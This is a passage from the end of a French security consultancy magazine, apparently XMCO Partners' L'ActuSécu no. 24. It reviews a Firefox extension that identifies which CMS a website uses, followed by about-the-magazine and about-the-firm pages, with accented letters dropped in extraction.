auditeurs et spcialistes du pentest manuel. Cette extension permet
d'identifier, en un clic, quel CMS est utilis par un site web.

L'extension se base sur des URLs, mots clefs, CSS ou noms de


rpertoires afin de dterminer parmi une base de connaissance sur
quel CMS l'application se base.

Capture dcran

Adresse Lextension est compatible avec toutes les versions du navigateur


Firefox et est disponible ladresse suivante :

http://www.backendinfo.com/
WWW.XMCOPARTNERS.COM

Avis XMCO Backend Software Information est une extension trs pratique
mais principalement rserve pour les pentesteurs d'applications
web.

L'extension reconnat en quelques secondes les CMS Reddit,


Blogger, Bugzilla, Wordpress, phpBB, Drupal, MediaWiki,
DiokuWiki, Typo3, Joomla et bien d'autres!

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [46]
L'ACTU SCU N24

propos de lActuScu

LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, et ce, en
toute indpendance.

Tous les numros de lActuScu sont tlchargeables ladresse suivante:


http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html

propos du cabinet Xmco Partners

Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous
n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
les axes majeurs de dveloppement de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de


missions daccompagnement de RSSI, dlaboration de schma directeur ou
encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.

Contacter le cabinet Xmco Partners

Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [47]
L'ACTU SCU N24

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [48]